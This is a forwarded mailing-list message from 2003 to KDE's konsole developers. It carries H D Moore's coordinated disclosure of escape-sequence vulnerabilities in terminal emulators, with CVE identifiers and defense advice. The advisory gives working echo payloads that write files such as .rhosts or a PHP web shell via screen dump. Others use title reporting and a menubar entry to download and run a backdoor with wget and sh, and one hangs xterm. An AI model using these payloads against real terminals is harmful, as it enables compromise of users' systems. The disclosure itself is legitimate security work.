--Boundary-00=_w21W+B7ceN0hdYi Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline I am happy to report that in the following report no security issues where found for konsole. Let's make sure we keep it that way :-) Cheers, Waldo -- bastian@kde.org -=|[ SuSE, The Linux Desktop Experts ]|=- bastian@suse.com --Boundary-00=_w21W+B7ceN0hdYi Content-Type: message/rfc822; charset="us-ascii"; name="forwarded message" Content-Transfer-Encoding: 8bit Content-Description: H D Moore : Terminal Emulator Security Issues Return-Path: Received: from outgoing.securityfocus.com (outgoing2.securityfocus.com [205.206.231.26]) by nitro.0wned.org (8.11.6/8.11.6) with ESMTP id h1OMpdC16797 for ; Mon, 24 Feb 2003 17:51:39 -0500 Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) by outgoing.securityfocus.com (Postfix) with QMQP id 1BCC18F2CE; Mon, 24 Feb 2003 15:46:27 -0700 (MST) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 4439 invoked from network); 24 Feb 2003 21:56:49 -0000 From: H D Moore To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com Subject: Terminal Emulator Security Issues Date: Mon, 24 Feb 2003 15:02:52 -0600 User-Agent: KMail/1.5 MIME-Version: 1.0 Content-Type: Multipart/Mixed; boundary="Boundary-00=_8hoW+tAPp3rhQmo" Message-Id: <200302241502.52947.termulation@digitaloffense.net> X-Spam-Status: No, hits=2.1 required=5.0 tests=BALANCE_FOR_LONG_20K,DISCLAIMER,MAILTO_TO_SPAM_ADDR, NORMAL_HTTP_TO_IP,SPAM_PHRASE_00_01,USER_AGENT version=2.42 X-Spam-Level: ** Status: R X-Status: N X-KMail-EncryptionState: X-KMail-SignatureState: --Boundary-00=_8hoW+tAPp3rhQmo Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Please see the attached document, also available at the following URL: http://www.digitaldefense.net/labs/ =2D-------------------------------------------------------- TERMINAL EMULATOR SECURITY ISSUES Copyright =A9 2003 Digital Defense Incorporated All Rights Reserved [ Table of Contents ] =2D- Summary=20 =2D- Disclaimer=20 =2D- Escape Sequences=20 =2D- Remote Exploitation=20 =2D- Screen Dumping=20 =2D- Window Title Reporting =2D- Miscellaneous Issues=20 =2D- Terminal Defense =2D- Tested Emulator Versions =2D- Vulnerability Index =2D- A Fictitious Case Study =2D- References =2D- Credits --Boundary-00=_8hoW+tAPp3rhQmo Content-Type: text/plain; charset="us-ascii"; name="Termulation.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="Termulation.txt" TERMINAL EMULATOR SECURITY ISSUES Copyright =A9 2003 Digital Defense Incorporated All Rights Reserved [ Table of Contents ] =2D- Summary=20 =2D- Disclaimer=20 =2D- Escape Sequences=20 =2D- Remote Exploitation=20 =2D- Screen Dumping=20 =2D- Window Title Reporting =2D- Miscellaneous Issues=20 =2D- Terminal Defense =2D- Tested Emulator Versions =2D- Vulnerability Index =2D- A Fictitious Case Study =2D- References =2D- Credits [ Summary ] Many of the features supported by popular terminal emulator software can be= abused=20 when un-trusted data is displayed on the screen. The impact of this abuse c= an range from=20 annoying screen garbage to a complete system compromise. All of the issues = below are=20 actually documented features, anyone who takes the time to read over the ma= n pages or=20 source code could use them to carry out an attack.=20 [ Disclaimer ] There is nothing new in this paper. The entire concept of exploiting a term= inal by=20 supplying hostile input has been around for over 10 years now. Unix veteran= s and BBS=20 users have been exposed to this type of problem since the very beginning, a= newsgroup=20 search can turn up all sorts of exploits, from the ever-popular "flash" pro= gram to the=20 abuse of logging features in xterm which were disabled in R5. Therefore the= purpose of=20 this paper is to identify weaknesses in the current suite of popular termin= al emulation=20 software, not to rehash an ancient problem. [ Escape Sequences ] Typically, an escape sequence is a series of characters starting with the A= SCII escape=20 character (0x1B) and followed by a specific set of arguments. Escape sequen= ces were=20 originally used to control display devices such as dumb terminals and have = been extended to allow various forms of interaction with modern operating systems. An esc= ape sequence=20 might be used to change text attributes (color, weight), move the cursor po= sition,=20 reconfigure the keyboard, update the window title, or manipulate the printe= r. Over the=20 years, many new features have been added that required enhancements to the = terminal=20 emulator applications to support them.=20 [ Remote Exploitation ] To exploit an escape sequence feature, an attacker must be able to display = arbitrary data=20 to the victim's terminal emulator. While at first glance that may seem rath= er unlikely, the=20 attacker can take advantage of a number of small bugs in other applications= to increase=20 their chance of success. Just about every network service that uses syslog will pass remote data dir= ectly to the=20 daemon without filtering the escape character. The responsibility then lays= on the syslog=20 daemon to strip the escape code before writing the log entry to the disk or= terminal. =20 Although both the stock *BSD syslog daemons as well the sysklogd package fi= lter escape=20 sequences, msyslog, syslog-ng, and the logging daemons supplied with many c= ommercial=20 UNIX-based operating systems do not. While sending data directly to a vulnerable syslogd or rwalld service is th= e most direct=20 form of attack, there are literally dozens of other ways to place hostile b= inary data onto the terminal of a remote user. The Apache web server makes an effort to cle= an garbage =20 from its access logs, but it still allows escape characters to be injected = into the error logs. Many command-line network tools can be exploited by a hostile service respo= nse, some=20 examples of this is include wget, curl, ftp, and telnet.=20 Multi-user systems are especially vulnerable, as any user can send a system= =2Dwide=20 message under the default configuration of most operating systems. Placing = the attack=20 data into the banner of a popular FTP server, telnet service, or message of= the day file=20 will increase the chance of finding a valid target. Certain console email c= lients refuse to=20 display files when the content-type of an attachment is set to a unrecogniz= ed value, so the=20 user must save the file and then read it on the command line, often just us= ing the standard=20 "cat" utility.=20 [ Screen Dumping ] =20 Eterm and rxvt both implement what they call the "screen dump" feature. Thi= s escape =20 sequence will cause an arbitrary file to be opened and filled with the curr= ent contents of=20 the terminal window. These are the only two tested emulators[1] that still = had the ability=20 to write to files enabled by default. Although rxvt will ignore dump reques= ts for existing=20 files, Eterm[2] will happily delete the file and then create it again. Alth= ough it is=20 technically the same feature, the OSC code used to trigger it is different = between the two=20 emulators. For rxvt, the screen dump code is 55, for Eterm, it is 30. It i= s possible to=20 control the entire contents of the file by specifying the reset sequence, t= hen the required=20 data, followed by the screen dump command.=20 $ echo -e "\ec+ +\n\e];/home/user/.rhosts\a" The same approach can be used to create an authorized_keys file for SSH, a = replacement=20 passwd file, or even a hostile PHP script written to the user's web directo= ry. This attack=20 requires no interaction on the part of the user and would be very difficult= to detect if done=20 correctly. The primary difference between this issue and some of the others= mentioned in=20 this paper is that the actual "exploitation" happens on the system running = the emulator=20 software, not the current system that the terminal is accessing. The code t= hat is =20 responsible for opening the dump file is shown below.=20 /* rxvt */=20 if ((fd =3D open(str, O_RDWR | O_CREAT | O_EXCL, 0600)) >=3D 0)=20 /* Eterm */=20 unlink(fname); outfd =3D open(fname, O_CREAT | O_EXCL | O_NDELAY | O_WRONLY, S_IRUSR | S_I= WUSR); [1] XFree86's xterm disabled an equivalent feature in X11R5 due to security= concerns. It=20 can still be enabled with a compile-time option. [2] Eterm actually disabled this in 0.9.2 (October 31, 2002), however many = recent Linux=20 distributions still shipped with 0.9.1. [ Window Title Reporting ] One of the features which most terminal emulators support is the ability fo= r the shell to=20 set the title of the window using an escape sequence. This feature was orig= inally=20 implemented by DEC for DECterm and has since been added to most emulators i= n use=20 today. The easy way to set the window title of a terminal is using the echo= command: $ echo -e "\e]2;This is the new window title\a" When the output of the above command is displayed on the terminal, it will = set the=20 window title to that string. Setting the window title by itself is not much= of a security=20 issue, however certain xterm variants (and dtterm) also provide an escape s= equence for=20 reporting the current window title. This essentially takes the current titl= e and places it=20 directly on the command line. Due to the way that most emulators processes = the escape=20 sequence, it is not possible to embed a carriage return into the window tit= le itself, so the=20 user would need to hit enter for it to process the title as a command. The = escape sequence=20 for reporting the window title is: $ echo -e "\e[21t" At this point, the attacker needs to convince the user to hit enter for the= "exploit" to=20 succeed. There are a number of techniques available to both hide the comman= d and=20 encourage the user to "press enter to continue". The simplest is to just in= sert a prompt=20 followed by the "invisible" character attribute right before reporting the = title. Another=20 method is to set the foreground and background colors to be the same (all b= lack or white)=20 and hope the user hits the enter key when trying to determine what happened= =2E The=20 following example for xterm demonstrates a sequence that downloads and exec= utes a=20 backdoor while hiding the command line. The "Press Enter >" string should b= e changed=20 to something appropriate for the attack vector. Some likely candidates incl= ude "wget=20 internal error: press enter to continue" or "Error: unknown TERM, hit enter= to continue". $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress E= nter>\e[8m;" Any terminal emulator that allows the window title to be placed on the comm= and-line is=20 vulnerable to this attack. The applications which were confirmed vulnerable= include=20 xterm, dtterm, uxterm, rxvt, aterm, Eterm, hanterm, and putty[1]. The teste= d applications=20 that did not allow the title to be written include gnome-terminal 2.0, kons= ole, SecureCRT, and aterm. [1] Although putty would place the title onto the command-line, we were not= able to find=20 a method of hiding the command, since neither the "invisible" character att= ribute nor the=20 foreground color could be set. Putty has a relatively low limit to the numb= er of characters=20 that can be placed into the window title, so it is not possible to simply f= lood the screen=20 with garbage and hope the command rolls past the current view. [ Miscellaneous Issues ] Eterm should be given an award for the "Easiest to Compromise" terminal emu= lator. The=20 developers based much of their code off of the rxvt and xterm source, so Et= erm tends to=20 share the same problems as those two emulators as well. If you happen to be= running a =20 CVS version of Eterm from between February 10th and May 8th of 2001, it was= possible=20 to execute an arbitrary command just by displaying the following escape seq= uence:=20 $ echo -e "\e]6;73;command\a" =20 =46ortunately, this feature never made it into an official release, the "fo= rk-and-exec" ability=20 was replaced by the script action spawn() instead.=20 During the research process, a number of small bugs were found that would e= ither lock=20 up the emulator completely or crash it. Although they can be disregarded as= simple denial=20 of service attacks, they could be abused to prevent an administrator from s= eeing =20 subsequent logs during a compromise. In general, the code which processed a= pplication- side input seemed to place little emphasis on sanitizing the data before pa= ssing it directly=20 to system-level functions. While there was some effort made to avoid standa= rd buffer =20 overflows, much of the loop-based character processing appeared ripe for a = denial of=20 service attack. An example of this is a bug in the DEC UDK processing of XF= ree86's=20 xterm application, the following command will place the process into a tigh= t resource- eating loop: $ echo -e "\eP0;0|0A/17\x9c" This bug was reported to xfree86@xfree86.org on December 17th, 2002 and no = response=20 was received as of the publication of this writing. The hanterm application= is also=20 vulnerable to this issue, as the code base started off as a direct copy of = xterm. Both rxvt and aterm support a feature known as the menuBar. This feature al= lows the user=20 to create drop-down menus at the top of the terminal screen using both menu= =20 configuration files and escape sequences. Anyone able to display data on th= e terminal =20 could modify the menu entries in a way that would compromise the system whe= n=20 accessed. This type of attack relies more on social engineering, but still = provides a=20 potential entry point when nothing else is available. The example below wil= l create a new=20 top-level menu item called "Special" with a single item labeled "Access", w= hen clicked it=20 will download and execute a backdoor from http://127.0.0.1/.bd and exit the= shell. $ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a= \e]10;[show]\a" [ Terminal Defense ] The ideal solution is to sanitize all data before displaying it on your ter= minal, however=20 without a custom terminal application or data filter, you can't guarantee t= hat every tool=20 you use on the command-line is going to strip escape sequences. The respons= ibility=20 should rest on the actual terminal emulator; any features that allow file o= r command-line=20 access should be disabled by default and more attention should be paid to n= ew features=20 that implement any use of escape sequences. The tested terminal emulators that were not susceptible to the screen dump = or window=20 title attacks include KDE's konsole, Gnome's gnome-terminal, Vandyke's Secu= reCRT,=20 and Sasha Vasko's aterm. Konsole and gnome-terminal each use their own inde= pendent=20 code-base and didn't try to support the same massive feature set as the oth= ers. =20 SecureCRT took a similar approach, emulating just the minimum needed to be = usable.=20 With aterm, the code was originally based on rxvt, however many of the dang= erous=20 features were removed as the project progressed. [ Test Emulator Versions ] xterm: xf86 4.2.0 (patch 165) aterm: 0.42 rxvt: 2.7.8 Eterm: 0.9.1 konsole: 3.1.0 rc5 putty: 0.53 SecureCRT: 3.4.6 gnome-terminal: 2.0.2 (libzvt 2.0.1) [2.2 indirectly] hanterm-xf: 2.0 [ Vulnerability Index ] The Common Vulnerabilities and Exposures project (cve.mitre.org) has assign= ed CVE=20 candidate namess for all issues described in this paper.=20 CAN-2003-0020 Apache Error Log Escape Sequence Injection CAN-2003-0021 Screen Dump: Eterm=20 CAN-2003-0022 Screen Dump: rxvt CAN-2003-0063 Window Title Reporting: xterm=20 CAN-2003-0064 Window Title Reporting: dtterm CAN-2003-0065 Window Title Reporting: uxterm CAN-2003-0066 Window Title Reporting: rxvt CAN-2003-0067 Window Title Reporting: aterm CAN-2003-0068 Window Title Reporting: eterm CAN-2003-0069 Window Title Reporting: putty CAN-2003-0070 Window Title Reporting: gnome-terminal CAN-2003-0078 Window Title Reporting: hanterm-xf CAN-2003-0071 DEC UDK Processing DoS: xterm CAN-2003-0079 DEC UDK Processing DoS: hanterm-xf CAN-2003-0023 Menubar Manipulation: rxvt CAN-2003-0024 Menubar Manipulation: aterm [ A Fictitious Case Study ] Jim is the sole administrator for the web server farm at a moderately sized= ISP. Most of=20 his company's clients maintain their own sites and Jim's primary responsibi= lity is to keep=20 the web servers online and secured. Jim spends some of his spare time dabb= ling with =20 PHP and uses his workstation as his development system. The workstation is = on the same=20 network segment as the rest of the servers and the firewall only allows TCP= port 80 and=20 443 inbound. Jim has a new 2.5Ghz P4 and finally has enough processing powe= r to run=20 the Enlightenment window manager with all the tweaks. His favorite part abo= ut=20 Enlightenment is the terminal emulator, Eterm, which lets him make the back= ground=20 transparent and do all sorts of imaging tricks. Jim keeps a tail process ru= nning for the=20 error_log files on each server he manages, allowing him to easily spot scri= pt bugs and=20 misconfigurations before the customer calls him to fix it.=20 Andre is pissed. Some "friends" from his old hacking group have posted some= =20 embarrassing photos of him on the group's home page. The page is hosted in = the ~user=20 directory on a web server at some dinky ISP his old friend uses. He starts = poking at the=20 web server only to give up about 30 minutes later after failing to find a s= ingle vulnerable=20 CGI or outdated service. He starts up Nmap again, this time on the whole c= lass C that the=20 web server resides in, determined to take down the entire subnet if he has = to. He finds=20 another web server, this one is running a traceroute gateway that is vulner= able to meta- character injection. Andre manages to get an outbound shell back to a bounc= e system and=20 proceeds to poke around. He finds what appears to be an OpenSSH public key = in the /tmp=20 directory, named JimH.pub. Looking at the key file, he sees that the userid= stored in it is=20 for jim@jimsbox.weeisp.com. A quick check shows that jimsbox.weeisp.com not= only=20 resolves to an external address, but is also running a web server.=20 The index page of Jim's web server consists of a couple pictures of him, so= me links to his=20 favorite news sites, some screenshots of his new super-leet desktop, and so= me of his=20 latest PHP projects. The first PHP project link Andre clicks on immediately= starts=20 spewing errors, complaining about not being able to connect to the database= =2E The error=20 message itself is interesting though, since it contains the full path to th= e script that=20 triggered the error. Andre makes a quick note of this and keeps digging aro= und, hoping=20 for an easy entry point. As soon as he pulls up the desktop screen shots, h= e knows he=20 struck gold. The screen shot not only shows a scantily clad Italian model i= n the=20 background, but an Eterm open tailing the logs of the same server his pictu= res are being=20 served from. He gets to work, hitting the workstation with every tool he ca= n find, but an=20 hour later he still hasn't busted a shell. While looking through the screen= shots again,=20 Andre gets the idea to look at the Eterm documentation and see what other f= eatures it=20 supports. Not only is the documentation easy to read with plenty of example= s, but it=20 mentions an interesting feature described as a "screen dump". About two hours later, Andre finally manages to get Eterm and its 60 megaby= tes of =20 support libraries compiled. He discovers that to force Eterm to write out a= file, all he has=20 to do is display a certain sequence of characters to the screen. The questi= on now is how to=20 get those characters onto that Eterm at 4:30 in the morning. After a quick = review of the=20 Apache source code, he finally finds a spot in the error handling code wher= e he can inject=20 arbitrary data into the log files. All he has to do is send a request for a= file with the escape sequence he wants to use and Apache will write the unfiltered data directly= to the log file.=20 Now that he can write arbitrary files to the workstation, he has to find a = method of using=20 it to gain access. Andre is pretty sure that the workstation is running SSH= , but the only=20 ports available are 80 and 443. He remembers that the PHP errors he saw ear= lier provided=20 the full path to the web root, if he can write files there, then he run com= mands through the=20 web server. Five minutes later, Andre is connecting to the target web serve= r and sending=20 a GET request for a string generated with the following command: $ echo -e "\ec\e]30;/home/www/htdocs/owned.php\a" This command clears the current screen buffer, displays his hostile PHP cod= e to the=20 screen, and then uses the screen dump command to write it into the web root= =2E He points=20 his browser to http://jimsbox.weeisp.com/owned.php?c=3Did and starts the pr= ocess of =20 rooting Jim's workstation, stealing his SSH keys, and taking those horrid p= ictures (as well=20 as the rest of the group's files) off of that web server. [ References ] This Paper and Associated Tools =2D-- http://www.digitaldefense.net/labs/whitepapers.html =2D-- http://www.digitaldefense.net/labs/securitytools.html Recognized Escape Sequences =2D-- Eterm: http://www.eterm.org/docs/view.php?doc=3Dref =2D-- xterm: http://rtfm.etla.org/xterm/ctlseq.html =2D-- dtterm: http://hpc.uky.edu/cgi-bin/man.cgi?section=3Dall&topic=3Ddtte= rm =2D-- rxvt: http://www.rxvt.org/refer/rxvtRef.html Solar Designer's Post on Syslog Filtering =2D-- http://marc.theaimsgroup.com/?l=3Dbugtraq&m=3D96938656931350 ADM's "The Evil Escape Sequences" =2D-- http://www.attrition.org/security/advisory/ADM/adm.evil.esc.advisory AmigaOS Escape Sequence Exploits =2D-- http://www.abraxis.co.uk/SA-2001-11-08.html MS-DOS/Windows Key Redefinition =2D-- http://lists.insecure.org/lists/bugtraq/1994/Jul/0029.html Multiple Emulator Window Resize DoS =2D-- http://archives.neohapsis.com/archives/bugtraq/2000-05/0409.html =2D-- http://groups.google.com/groups?selm=3DE12zFeu-00075I-00%40ixion The Original "Flash" =2D-- http://www.parallaxresearch.com/files/unix/exploits/flash.c =2D-- http://groups.google.com/groups?selm=3D342k7c%243ne%40news.ysu.edu =2D-- http://www.phrack-dont-give-a-shit-about-dmca.org/show.php?p=3D47&a= =3D4 [ Credits ] This paper was written by H D Moore, with much help from the rest of the Di= gital=20 Defense Operations Team. I would like to thank Solar Designer for providing= some great=20 feedback on the original draft and Mark Cox for handling the CVE candidate = generation=20 and vendor coordination. --Boundary-00=_8hoW+tAPp3rhQmo-- --Boundary-00=_w21W+B7ceN0hdYi-- _______________________________________________ konsole-devel mailing list konsole-devel@mail.kde.org http://mail.kde.org/mailman/listinfo/konsole-devel